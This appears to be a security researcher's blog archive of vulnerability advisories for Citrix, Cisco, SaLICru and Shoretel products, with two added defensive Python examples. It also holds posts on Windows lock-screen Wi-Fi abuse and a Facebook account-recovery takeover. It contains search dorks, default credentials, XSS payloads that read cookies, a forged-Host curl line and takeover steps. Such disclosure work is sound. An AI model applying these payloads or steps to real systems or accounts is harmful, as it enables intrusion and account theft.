
Tuesday, 16 July 2019

Citrix Netscaler Gateway Information Disclosure Vulnerabilities

# Exploit Title: Citrix Netscaler Gateway Information Disclosure Vulnerabilities.
# Google Dork: intitle:"netscaler gateway" intext:password "please log on"
# Discovered Date: 07/03/2014
# Exploit Author: Ramikan
# Website: http://fact-in-hack.blogspot.com
# Vendor Homepage: https://www.citrix.com/products/citrix-gateway/
# Affected Devices: citrix-gateway
# Tested On: citrix-gateway 11.1.53.11, 12.0.61.8
# Version: 11.X through 12.0.X; other versions may be affected too.
# CVE :
# Category: Hardware, Web Apps
# Reference: https://github.com/Ramikan/Vulnerabilities/
*************************************************************************************************************************************

Vulnerability : Information Gathering

Accessing the link below directly discloses the version number and also the file path locations of the client plugins.

https://<ip address>/vpn/pluginlist.xml

*************************************************************************************************************************************
Output:
*************************************************************************************************************************************

<?xml version="1.0" encoding="ISO-8859-1"?>
<repositories>
<repository name="default">
<plugin type="WIN-EPA" path="/epa/scripts/win/nsepa_setup.exe" name="" compatibleTill="" compatibleFrom="12.0.0.0" version="12.0.61.8"/>
<plugin type="WIN-EPA64" path="/epa/scripts/win/nsepa_setup64.exe" name="" compatibleTill="" compatibleFrom="12.0.0.0" version="12.0.61.8"/>
<plugin type="WIN-VPN" path="/vpns/scripts/vista/AGEE_setup.exe" name="" compatibleTill="" compatibleFrom="12.0.0.0" version="12.0.61.8"/>
<plugin type="MAC-EPA" path="/epa/scripts/mac/Citrix_Endpoint_Analysis.dmg" name="" compatibleTill="" compatibleFrom="3.1.2.0" version="3.1.2.0"/>
<plugin type="MAC-VPN" path="/vpns/scripts/mac/Citrix_Access_Gateway.dmg" name="" compatibleTill="" compatibleFrom="4.4.0 (510)" version="4.4.0 (510)"/>
<plugin type="WIN-EPA-ENGINE" path="/epa/scripts/win/epaPackage.exe" name="EPA scanning Engine (Opswat) for Windows" version="1.1.2.6" opswatVersion="4.3.344.0"/>
<plugin type="MAC-EPA-ENGINE" path="/epa/scripts/mac/MacLibs.zip" name="EPA scanning Engine (Opswat) for Mac" version="1.2.6.3" opswatVersion="4.3.244.0"/>
</repository>
</repositories>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Alternatively, you can follow the steps below.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1. Open in browser:
https://<IP address>/epa/scripts/win/nsepa_setup.exe

2. Save the file "nsepa_setup.exe" and extract it with an archiver (7-Zip).

3. From the newly extracted files, extract the "nsepa.msi" file again.

4. From those extracted files, extract the "nsepa.cab" file again.

5. Select "Properties" on the extracted "nsepa.exe" file.

6. Open the "Details" tab, where the version is visible.
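As an added example (not part of the original advisory), a small parser for the pluginlist.xml format shown above, so an administrator can review exactly what an unauthenticated reader learns from their own gateway: the build stamped on the Windows client plugins, every download path, and the bundled third-party engine versions. The sample XML is a trimmed, constructed copy of the output above.

```python
import xml.etree.ElementTree as ET

# Constructed sample: a trimmed copy of the pluginlist.xml shown in the advisory.
SAMPLE_PLUGINLIST = """<?xml version="1.0" encoding="ISO-8859-1"?>
<repositories>
<repository name="default">
<plugin type="WIN-EPA" path="/epa/scripts/win/nsepa_setup.exe" name="" compatibleTill="" compatibleFrom="12.0.0.0" version="12.0.61.8"/>
<plugin type="MAC-VPN" path="/vpns/scripts/mac/Citrix_Access_Gateway.dmg" name="" compatibleTill="" compatibleFrom="4.4.0 (510)" version="4.4.0 (510)"/>
<plugin type="WIN-EPA-ENGINE" path="/epa/scripts/win/epaPackage.exe" name="EPA scanning Engine (Opswat) for Windows" version="1.1.2.6" opswatVersion="4.3.344.0"/>
</repository>
</repositories>"""

# Plugin types whose version string matches the gateway build in the advisory output.
GATEWAY_BUILD_TYPES = ("WIN-EPA", "WIN-EPA64", "WIN-VPN")


def parse_pluginlist(xml_text):
    """Return one dict per <plugin>, keeping the attributes an exposure review cares about."""
    # The declaration says ISO-8859-1, so hand expat bytes in that encoding.
    root = ET.fromstring(xml_text.encode("latin-1"))
    plugins = []
    for plugin in root.iter("plugin"):
        plugins.append({
            "type": plugin.get("type", ""),
            "path": plugin.get("path", ""),
            "version": plugin.get("version", ""),
            "opswatVersion": plugin.get("opswatVersion"),  # only on *-ENGINE entries
        })
    return plugins


def exposure_summary(plugins):
    """Summarise the disclosure: inferred gateway build, file paths, third-party engine versions."""
    builds = {p["version"] for p in plugins if p["type"] in GATEWAY_BUILD_TYPES}
    return {
        "gateway_version": sorted(builds),
        "download_paths": sorted(p["path"] for p in plugins),
        "third_party": {p["type"]: p["opswatVersion"] for p in plugins if p["opswatVersion"]},
    }


if __name__ == "__main__":
    for key, value in exposure_summary(parse_pluginlist(SAMPLE_PLUGINLIST)).items():
        print(f"{key}: {value}")
```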

Monday, 15 July 2019

Cisco Small Business 200, 300, 500 Switches Multiple Vulnerabilities - CVE-2019-1943

# Exploit Title: Cisco Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
# Shodan query: /config/log_off_page.html
# Discovered Date: 07/03/2014
# Reported Date: 08/04/2019
# Exploit Author: Ramikan
# Website: https://github.com/Ramikan
# Vendor Homepage: https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html
# Affected Devices: "all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled"
# Tested On: Cisco C300 Switch
# Version: 1.3.7.18
# CVE : CVE-2019-1943
# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
# Category: Hardware, Web Apps
# Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect


*************************************************************************************************************************************

Vulnerability 1: Information Gathering

*************************************************************************************************************************************

An unauthenticated user can find the version number and device type by visiting this link directly.

Affected URL:

/cs703dae2c/device/English/dictionaryLogin.xml

*************************************************************************************************************************************

Vulnerability 2: Open Redirect via the Host header


*************************************************************************************************************************************

Changing the Host header to a different domain makes the device redirect the request to that domain. This can be used for a phishing attack and also for domain fronting.

Normal Request

GET / HTTP/1.1
Host: 10.1.1.120
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cache-Control: max-age=0

Normal Response

HTTP/1.1 302 Redirect
Server: GoAhead-Webs
Date: Fri Mar 07 09:40:22 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: https://10.21.151.120/cs703dae2c/

<html><head></head><body>
                        This document has moved to a new <a href="https://10.1.1.120/cs703dae2c/">location</a>.
                        Please update your documents to reflect the new location.
                        </body></html>
*************************************************************************************************************************************
POC
*************************************************************************************************************************************

Host Header changed to different domain (example google.com).

Request:

GET /cs703dae2c HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: activeLangId=English; isStackableDevice=false
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 302 Redirect
activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
Date: Fri Mar 07 09:45:26 2014
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://google.com/cs703dae2c/config/log_off_page.htm

<html><head></head><body>
                        This document has moved to a new <a href="http://google.com/cs703dae2c/config/log_off_page.htm">location</a>.
                        Please update your documents to reflect the new location.
                        </body></html>


The redirection goes to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker needs to be on the same network and able to modify the victim's request on the wire in order to trigger this vulnerability.

*************************************************************************************************************************************
Attack Vector:
*************************************************************************************************************************************
Can be used for domain fronting.

curl -k --header "Host: attack.host.net" "domainname of the cisco device"
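As an added example (not the device's firmware, not part of the original advisory), the redirect logic observed above modelled in Python: the vulnerable form builds Location from whatever Host the request carried, while the hardened form only echoes a Host that names this device and otherwise falls back to a path-relative Location, which the browser resolves against the origin it actually connected to. The allowlist and the second hostname are assumptions; the path is the one from the advisory.

```python
from urllib.parse import urlsplit

# Path taken from the advisory's response; the allowlist is a constructed assumption.
LOGOFF_PATH = "/cs703dae2c/config/log_off_page.htm"
ALLOWED_HOSTS = {"10.1.1.120", "switch01.example.net"}


def redirect_vulnerable(headers):
    """Mirror the observed behaviour: Location is built from the client-supplied Host,
    so an on-path attacker who rewrites Host controls where the victim is sent."""
    return "http://" + headers["Host"] + LOGOFF_PATH


def _host_only(host_header):
    """Normalise a Host value: drop :port and userinfo tricks, lower-case the name."""
    parsed = urlsplit("//" + host_header)
    return (parsed.hostname or "").lower()


def redirect_hardened(headers):
    """Echo Host back only when it names this device; otherwise emit a relative Location."""
    host = _host_only(headers.get("Host", ""))
    if host in ALLOWED_HOSTS:
        return "https://" + host + LOGOFF_PATH
    return LOGOFF_PATH


def host_header_alerts(requests):
    """Detection helper: return the Host values in a batch of requests that do not
    match the device, the signal a defender would log for this vulnerability."""
    return [h["Host"] for h in requests if _host_only(h.get("Host", "")) not in ALLOWED_HOSTS]


if __name__ == "__main__":
    # Constructed requests: the normal one and the tampered one from the write-up.
    normal = {"Host": "10.1.1.120"}
    tampered = {"Host": "google.com"}
    print("vulnerable:", redirect_vulnerable(tampered))
    print("hardened:  ", redirect_hardened(tampered))
    print("alerts:    ", host_header_alerts([normal, tampered]))
```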


*************************************************************************************************************************************
Vendor Response:
*************************************************************************************************************************************

Issue 1:
Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.

Issue 2:
The developers won’t be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.

We have assigned CVE CVE-2019-1943 for this issue.

Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect

*************************************************************************************************************************************

Monday, 8 April 2019

CVE-2019-10887 - SaLICru SLC-20-cube3(5) - HTML Injection

# Exploit Title: Reflected HTML Injection
# Google Dork: None
# Date: 16/12/2015
# Exploit Author: Ramikan
# Vendor Homepage: https://www.salicru.com/en/
# Software Link: N/A
# Version: Tested on SaLICru SLC-20-cube3(5).
# Firmware: cs121-SNMP v4.54.82.130611
# CVE : CVE-2019-10887
# Category: Web Apps


Vulnerability: Reflected HTML Injection
Vendor Web site:
Version tested: cs121-SNMP v4.54.82.130611
Solution: N/A
Note: Default credentials: admin/admin or admin/cs121-snmp
The victim needs to be authenticated in order to be affected by this.


Vulnerability 1: Reflected HTML Injection

Affected URL:

/DataLog.csv?log=
/AlarmLog.csv?log=
/waitlog.cgi?name=
/chart.shtml?data=
/createlog.cgi?name=

Affected Parameter: log, name, data

Payload:
<h1>HTML Injection</h1>

Thursday, 7 December 2017

Shoretel Connect Multiple Vulnerabilities (CVE-2019-9591, CVE-2019-9592, CVE-2019-9593)

# Exploit Title: Shoretel Connect Multiple Vulnerabilities
# Google Dork: inurl:/signin.php?ret=
# Date: 14/06/2017
# Author: Ramikan
# Vendor Homepage: https://www.shoretel.com/
# Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview
# Version: Tested on 18.62.2000.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0; other versions may be affected.
# Tested on: Mozilla Firefox 53.0.3 (32 bit) Browser
# CVE : CVE-2019-9591, CVE-2019-9592, CVE-2019-9593
# Category: Web Apps


Vulnerability: Reflected XSS and Session Fixation
Vendor Web site: http://support.shoretel.com
Version tested: 18.62.2000.0, 19.45.1602.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0
Google dork: inurl:/signin.php?ret=
Solution: Update to 19.49.1500.0



Vulnerability 1: Reflected XSS & Form Action Hijacking

Affected URL:

/signin.php?ret=http%3A%2F%2Fdomainname.com%2F%3Fpage%3DACCOUNT&&brand=4429769&brandUrl=https://domainname.com/site/l8o5g--><script>alert(1)</script>y0gpy&page=ACCOUNT

Affected Parameter: brandUrl


Vulnerability 2: Reflected XSS

Affected URL:

/index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b

Affected Parameter: url
Affected Version 19.45.1602.0


Vulnerability 3: Reflected XSS

/site/?page=jtqv8"><script>alert(1)</script>bi14e

Affected Parameter: page
Affected Version: 18.82.2000.0

GET /site/?page=jtqv8"><script>alert(1)</script>bi14e HTTP/1.1
Host: hostnamem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bdrsconference.bdrs.com/signin.php
Cookie: PHPSESSID=2229e3450f16fcfb2531e2b9d01b9fec; chkcookie=1508247199505
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Vulnerability 4: Session Hijacking

By exploiting the above XSS vulnerability, the attacker can obtain the valid session cookies of an authenticated user and hijack the session.

Both cookies, PHPSESSID and chkcookie, are insecure.

Tuesday, 9 August 2016

How to Hack Locked Windows Laptop



Description:
Windows 8, Windows 10 and Windows Server 2012 come with a default user logon screen, and one of the features of that logon screen is the network selection user interface. This feature allows users to connect to a wireless network, turn the network card on and off, etc., without having to unlock the Windows screen.



Risk:
This feature exposes a security risk. If an adversary has physical access to the machine even for a few seconds, they can open this network UI and connect the system to a rogue wireless access point under their control, then later perform a MITM attack (as an example) and potentially compromise the whole system.
 

Affected System:
Devices running Windows 8, Windows 10 or Windows Server 2012 with a wireless card.



Recommendation:
To protect against this risk, disable the network UI on the logon screen. This can be done through Group Policy or in the registry by going to
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System
and adding DontDisplayNetworkSelectionUI=dword:00000001


Saturday, 30 January 2016

Can I Hack Your Facebook ?

Facebook had a fantastic option for retrieving your account if you had forgotten both your password and username and also did not have access to your registered email account.

All you need is 3 good friends who are in your friends list. Yes, the same old friends are back in the frame for getting back your account; after all these years, the best way Facebook came up with to retrieve the account was by sending security codes to 3 of your friends. Once you have the codes, you can get back into your account.

This should be a great solution for someone who desperately wants to get his account back. This option is also good for hackers who can take over accounts. How?

Just create 3 fake FB accounts (impersonate) and get added into the victim's trusted friends list, then simply follow the Facebook recovery option and you're done, you have hacked someone's account.

Click "No longer have access to these?"

Enter the email ID that you can access and continue.

Click Continue and now comes the fantastic option. :)

Select those 3 fake friends that you managed to add to the victim's friends list and continue.

Your fake friends will receive security codes; complete the process, reset the account with a new password, and now you have hacked into the account.

This option has now been removed by FB, thank god for that, but hey, believe me, after 5 years they will come up again with similar stupid options, so people who just accept friend requests from everyone, please keep this in mind: you may have just added a hacker as your friend.....

Next time we will see how to deny any FB user access to Facebook for a few hours or even up to a few days.... Sounds like fun?

Keep safe...

Conformio-Online Compliance Tool Multiple Vulnerabilities

# Exploit Title: Conformio-Online Compliance Tool Multiple Vulnerabilities. # Discovered Date: 16/11/2017 # Exploit Author: Ramikan # Websi...